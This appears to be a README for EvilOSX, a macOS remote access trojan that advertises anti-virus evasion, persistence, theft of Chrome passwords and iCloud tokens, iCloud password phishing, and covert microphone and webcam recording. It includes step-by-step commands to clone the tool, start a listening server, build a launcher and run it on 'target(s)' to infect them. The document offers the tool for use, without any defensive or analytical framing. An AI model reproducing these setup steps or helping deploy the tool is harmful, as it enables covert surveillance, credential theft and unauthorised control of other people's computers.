EvilOSX is an evil Remote Administration Tool (RAT) for macOS / OS X with the following features:
- Emulate a terminal instance
- Simple extendable module system
- No bot dependencies
- Undetected by anti-virus
- Persistent
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history
- Phish for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation
How To Use EvilOSX
- The server side requires python3 to run.
- The bot side is written in python2 which is already installed on macOS / OS X.
- Once python3 is installed, open a terminal and type the following:
    # Clone or download this repository
    $ git clone https://github.com/Marten4n6/EvilOSX

    # Go into the repository (requirements.txt lives inside it)
    $ cd EvilOSX

    # Install dependencies required by the server
    $ sudo pip3 install -r requirements.txt

    # Start listening for connections
    $ python3 start.py

    # Lastly, run the built launcher (see the builder tab) on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.
There is also a command line interface for those who want to use this over SSH:
    # Create a launcher to infect your target(s)
    $ python3 builder.py

    # Start listening for connections
    $ python3 start.py --cli --port 1337

    # Lastly, run the built launcher on your target(s)